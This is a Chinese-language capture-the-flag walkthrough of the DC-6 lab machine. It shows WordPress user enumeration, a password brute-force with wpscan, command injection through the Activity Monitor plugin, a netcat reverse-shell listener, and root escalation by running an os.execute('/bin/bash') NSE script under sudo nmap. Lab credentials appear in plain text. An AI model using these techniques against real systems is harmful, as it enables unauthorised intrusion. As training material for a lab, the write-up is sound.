【CyberSecurityLearning 75】DC系列之DC-6渗透测试（WordPress）

目录

DC-6靶机渗透测试

1、信息收集

1.1 发现DC-6的IP地址

1.2 扫描开放端口

1.3 访问web网页（添加本地DNS解析）

1.4 Wpscan扫描站点（用户名）

2、WEB渗透

2.1 爆破WordPress站点用户名和密码

2.2 爆破后台路径

2.3、activity monitor漏洞利用

2.4  进入mark的家目录

2.5、反弹jens用户的shell

3、通过nmap提权

---

 

DC-6靶机渗透测试

0x00实验环境

靶机：DC-6，MAC地址：00:0C:29:85:9D:FD（192.168.3.190）

测试机：Kali，IP地址：192.168.3.188

1、信息收集

1.1 发现DC-6的IP地址

利用DC-6的MAC地址找到IP
命令：nmap -sP 192.168.3.1/24 -oN nmap.sP
发现DC-6的IP为192.168.3.190

1.2 扫描开放端口

nmap -A 192.168.3.190 -p 1-65535 -oN nmap.A

发现开放了22端口和80端口

以及：http-title: Did not follow redirect to http://wordy/    访问ip后会重定向到http://wordy/

1.3 访问web网页（添加本地DNS解析）

本机访问192.168.3.190，发现网页打不开，是因为没有添加本地DNS解析

我们在本机C:\Windows\System32\drivers\etc的hosts文件中添加

本地添加DNS解析之后，刷新后发现能成功访问（我们原来输入的是IP地址，它会自动跳转到wordy）

发现：
Wordy
Just another WordPress site

是一个WordPress（是国外三大开源的PHP CMS 之一）

除了本地需要修改hosts文件，那我们用kali虚拟机去访问目标80端口的时候，我们也需要去修改一下本机的host文件
vim /etc/hosts

1.4 Wpscan扫描站点（用户名）

wpscan --url wordy -e u           列出WordPress用户和账号

u	枚举用户名，默认从1-10
--enumerate	-e [option(s)]  枚举
--url	-u  要扫描的`WordPress`站点.

在使用wpscan之前我们要做一个工具的更新:   wpscan --update    更新工具

2、WEB渗透

2.1 爆破WordPress站点用户名和密码

扫描后发现存在admin、sarah、graham、mark、jens用户，尝试爆破出密码

DC-6的作者在这里也给出了密码的提示https://www.vulnhub.com/entry/dc-6,315/

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

先把admin、sarah、graham、mark、jens用户写在user.dic

wpscan --url wordy -U user.dic -P passwords.txt（使用wpscan爆破WordPress站点用户名和密码）

Username: mark,
Password: helpdesk01

2.2 爆破后台路径

Robots.txt 有时会写着，在一个一般开源cms都是有固定后台的，比如joomla后台路径就是administrator ,wordpress的就是wp_admin ，dedecms就是dede 常用的还有admin login manger 等等

登录后台：

发现使用了activity monitor插件

2.3、activity monitor漏洞利用

百度搜索其漏洞：http://blog.nsfocus.net/cve-2018-15877/

或者kali搜索其插件漏洞：
searchsploit active monitor

存在远程执行漏洞可以反弹shell 到本地

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

打开45274.html，修改如下两处地方

python -m SimpleHTTPServer

当前目录下开启http 服务

本机Submit request

本地再监听9999，发现没有反弹成功诶！

burp抓包看看：发现后面加管道符可以执行代码

可以看到漏洞说的确存在的，那么我们下一步就弹shell

我们现在本地监听一下：nc -lvvp 2333

抓包改包、放包

连接成功：

进入交互式shell

2.4  进入mark的家目录

- Add new user: graham - GSo7isUM1D4 - done

得到用户graham的密码，用ssh远程登录

检查sudo权限

可以看到 “backups.sh” 不需要密码，即可修改

利用这个sh脚本可以直接获取到jens的shell

2.5、反弹jens用户的shell

sudo -l看一下

 

3、通过nmap提权

nmap提权可以参考：https://gtfobins.github.io/gtfobins/nmap/#shell

echo "os.execute('/bin/bash')" >> root.nse    #将os.execute('/bin/bash')写入到root.nse文件中

sudo nmap --script=root.nse                         #利用nmap插件执行/bin/bash来获取root权限

1、用wpscan扫描用户名和爆破密码

2、activity monitor命令执行漏洞的利用

3、通过nmap插件来反弹shell